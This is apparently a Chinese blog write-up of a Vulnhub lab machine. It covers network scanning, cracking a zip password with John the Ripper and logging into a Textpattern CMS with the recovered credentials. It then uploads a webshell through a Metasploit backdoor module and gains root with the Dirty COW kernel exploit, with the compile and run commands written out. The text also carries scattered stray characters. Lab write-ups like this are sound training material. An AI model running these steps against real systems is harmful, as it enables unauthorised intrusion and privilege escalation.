在Vulnhub做的第一臺(tái)织阳,記錄一下眶蕉。
靶機(jī)地址在此
信息收集
kali里使用netdiscover
發(fā)現(xiàn)主機(jī)
靶機(jī)地址為
192.168.3.119
nmap掃描查看服務(wù)
輸入
nmap -sS -sV -A 192.168.3.119
由截圖可見(jiàn)只開(kāi)了一個(gè)80端口,根節(jié)點(diǎn)里有robots.txt文件唧躲,查看robots.txt
由截圖可知robots協(xié)議禁止了爬蟲(chóng)爬取網(wǎng)站的
/textpattern/textpattern/
目錄造挽,既然它禁止了,那我們就打開(kāi)看一下吧弄痹,發(fā)現(xiàn)是一個(gè)cms:另外饭入,robots協(xié)議還提醒了我們暴力破解目錄路徑時(shí)不要忘記了.zip文件,那看來(lái)某個(gè)zip文件有彩蛋肛真。
攻擊
目錄爆破之:
spammer是一個(gè)zip文件谐丢,url打開(kāi)可下載
解密這個(gè)文件發(fā)現(xiàn)需要密碼
爆破zip
執(zhí)行
zip2john spammer.zip >> passwd.txt
然后再執(zhí)行:
john passwd.txt
得到密碼是:myspace4
用密碼打開(kāi)zip文件里面的creds.txt,得到mayer:lionheart
,看上去應(yīng)該是賬號(hào)密碼乾忱,用這個(gè)賬號(hào)登錄上面的cms讥珍,成功登錄。
找到files模塊窄瘟,是一個(gè)上傳模塊
上傳測(cè)試文件以及webshell衷佃,我用了msf里的菜刀
use exploit/multi/http/caidao_php_backdoor_exec
拿到meterpreter:
提權(quán)
因?yàn)槭且粋€(gè)www-data賬戶,需要升級(jí)到root權(quán)限蹄葱。查看靶機(jī)內(nèi)核信息:
在exploit-db尋找內(nèi)核漏洞氏义,第一條顯示有臟牛漏洞
根據(jù)url里的40839在kali里查找這個(gè)攻擊腳本
執(zhí)行
searchsploit 40839
在meterpreter里把這個(gè)攻擊腳本上傳到靶機(jī),這個(gè)時(shí)候一般要上傳到一個(gè)可寫(xiě)的文件夾新蟆,然而我們當(dāng)前的文件夾就是可寫(xiě)的觅赊,所以上傳到當(dāng)前文件夾就可以,執(zhí)行
upload /usr/share/exploitdb/exploits/linux/local/40839.c ./40839.c
攻擊文件的注釋里一般有編譯方法琼稻,查看
例子:
gcc -pthread dirty.c -o dirty -lcrypt
靶機(jī)執(zhí)行:
gcc -pthread 40839.c -o 40839 -lcrypt
為了保險(xiǎn)給777權(quán)限:
chmod 777 40839
最后執(zhí)行:
./40839
會(huì)要求你輸入一個(gè)新的密碼:
這個(gè)腳本會(huì)把root換成一個(gè)
firefart
的賬號(hào)吮螺,這個(gè)賬號(hào)就是root,密碼就是上面輸入的密碼帕翻。但是在這個(gè)shell里是不能夠用su切換賬戶的鸠补,需要使用到tty(即Terminal)
關(guān)于tty,點(diǎn)擊這里
tty根據(jù)靶機(jī)的實(shí)際環(huán)境有各種方法切換嘀掸,這里有詳細(xì)介紹
我們用第一條python執(zhí)行
python -c 'import pty; pty.spawn("/bin/sh")'
拿到flag
總結(jié)
這臺(tái)靶機(jī)的攻擊很簡(jiǎn)單紫岩,但是提權(quán)我做了很久,總結(jié)一些經(jīng)驗(yàn):
1睬塌,一定要查看提權(quán)腳本的注釋泉蝌,知道腳本的大概邏輯。
2揩晴,c文件最好在靶機(jī)編譯勋陪,不要在攻擊機(jī)編譯完再upload上去。
3硫兰,給777權(quán)限诅愚,不然可能會(huì)有坑。